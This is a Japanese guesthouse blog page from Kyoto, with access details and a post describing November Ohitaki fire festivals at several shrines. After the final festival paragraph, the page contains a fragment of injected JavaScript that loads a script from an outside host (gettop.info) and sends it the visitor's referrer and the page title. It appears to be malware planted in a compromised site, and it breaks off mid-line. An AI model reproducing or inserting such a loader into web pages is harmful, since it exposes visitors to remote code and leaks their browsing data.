京都職人の家 - Kyoto Craftsman House

所在地

京都職人の家

603-8224  京都府 北区 紫野

バス停 大徳寺前より 徒歩  5分
地下鉄北大路駅より  徒歩 20分
京都駅より北大路駅までは地下鉄で15分

予約またはより詳しいご案内ご希望の方はメールにてお願いします。また京都観光スポットについての質問などお気軽にメールしてください。

RSS

お火焚祭

11月は京都の多くの神社でお火焚祭が行われます。
五行説の「火生土」(火は土を生ず)から、火を焚いて作物を育てた土を甦らせるといわれることにもとづいて行われます。
神社では、火を焚き、祝詞や神楽で神さまをもてなし、秋の収穫を感謝する新嘗祭 しんじょうさい/にいなめさい の意味も込められています。
また神社だけでなく、鍛冶屋・染物屋・造酒屋など火を使うお店や一般家庭でも「おくどさん」(台所のかまど)に感謝して火をおこし、お供え物をします。
いまは、かまどもなく、IHで炎すら見られない家庭も多いですが・・・。
お供えものは、みかん、お火焚き饅頭と「火をおこす」からおこしなどです。

主な火焚祭は、
伏見稲荷大社 火焚祭11月8日 
全国一のスケールで立ち上る炎に圧倒されます。神楽女の神楽舞が行われます。

貴船神社 貴船もみじ祭 御火焚祭・日供講員大祭おにっくこういんたいさい 7日11時
古来のロクロヒキリと呼ばれる道具で神聖な火をおこして始まります。
6月は水の霊力で、11月は火の霊力で人々の罪や穢れを取り除く、お清めの神事。
水の神様は火の神様から生まれたという貴船大神出現の故事を伝える神事です。

車折神社 火焚祭11月23日
かまどの守護神である奥津彦、奥津姫を迎え、古式にのっとり神事がおこなわれます。祭典終了後に、参拝者に新米のお粥が無料で振舞われます。

新日吉神社 11月14日
金物の神をまつり、平安中期の刀匠の古事にちなみ、火焚串を「ふいご」の形に積み上げ、火の勢いが衰えた頃ミカンを投げ入ます。
焚かれたミカンは中風封じや風邪薬の効能があるといわれ、農耕に鉄器が不可欠であったことから五穀豊穣を祈るお祭です。s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; if (document.currentScript) {

意見・感想を投稿する

http://kyoto888.com/?p=530You must be logged in to post a comment.